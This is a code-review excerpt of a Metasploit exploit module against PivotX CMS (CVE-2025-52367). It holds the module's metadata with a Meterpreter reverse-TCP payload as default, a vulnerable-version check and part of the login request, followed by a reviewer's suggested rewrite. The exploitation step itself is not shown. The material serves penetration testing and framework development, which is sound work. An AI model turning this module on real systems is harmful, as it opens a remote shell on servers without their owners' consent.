modules/exploits/linux/http/pivotx_rce.rb

```diff
@@ -0,0 +1,169 @@
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'HayToN', # security research
+          'msutovsky-r7' # module dev
+        ],
+        'References' => [
+          [ 'EDB', '52361' ],
+          [ 'URL', 'https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3'],
+          [ 'CVE', '2025-52367']
+        ],
+        'Targets' => [
+          [
+            'Linux',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+            }
+          ]
+        ],
+        'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
+        'DisclosureDate' => '2025-07-10',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options([
+      OptString.new('USERNAME', [ true, 'PivotX username', '' ]),
+      OptString.new('PASSWORD', [true, 'PivotX password', '']),
+      OptString.new('TARGETURI', [true, 'The base path to PivotX', '/PivotX/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'index.php')
+    })
+
+    return Exploit::CheckCode::Unknown, 'Unexpected response' unless res&.code == 200
+
+    return Exploit::CheckCode::Safe, 'Target is not PivotX' unless res.body.include?('PivotX Powered')
+
+    html_body = res.get_html_document
+
+    return Exploit::CheckCode::Unknown, 'Could not find version element' unless html_body.search('em').find { |i| i.text =~ /PivotX - (\d.\d\d?.\d\d?-[a-z0-9]+)/ }
+
+    version = Rex::Version.new(Regexp.last_match(1))
+
+    return Exploit::CheckCode::Appears, "Detected PivotX  #{version}" if version <= Rex::Version.new('3.0.0-rc3')
+
+    return Exploit::CheckCode::Safe, "PivotX  #{version} is not vulnerable"
+  end
+
+  def login
+    boundary = Rex::Text.rand_text_alphanumeric(16).to_s
+    data_post = "------WebKitFormBoundary#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"returnto\"\r\n\r\n"
+    data_post << "\r\n"
+    data_post << "------WebKitFormBoundary#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"template\"\r\n\r\n"
+    data_post << "\r\n"
+    data_post << "------WebKitFormBoundary#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"username\"\r\n\r\n"
+    data_post << "#{datastore['USERNAME']}\r\n"
+    data_post << "------WebKitFormBoundary#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"password\"\r\n\r\n"
+    data_post << "#{datastore['PASSWORD']}\r\n"
+    data_post << "------WebKitFormBoundary#{boundary}\r\n"
```

Comment:
You should be able to use `Rex::MIME::Message` here
```suggestion
boundary = Rex::Text.rand_text_alphanumeric(16).to_s
data_post = Rex::MIME::Message.new
data_post.bound = boundary

data_post.add_part('', nil, nil, 'form-data; name="returnto"')
data_post.add_part('', nil, nil, 'form-data; name="template"')
data_post.add_part(datastore['USERNAME'], nil, nil, 'form-data; name="username"')
data_post.add_part(datastore['PASSWORD'], nil, nil, 'form-data; name="password"')
```

Reply:
Maybe you tried something slightly different before? The above suggestion has been tested successfully on my installation. Give it a try and let me know if you run into any issues.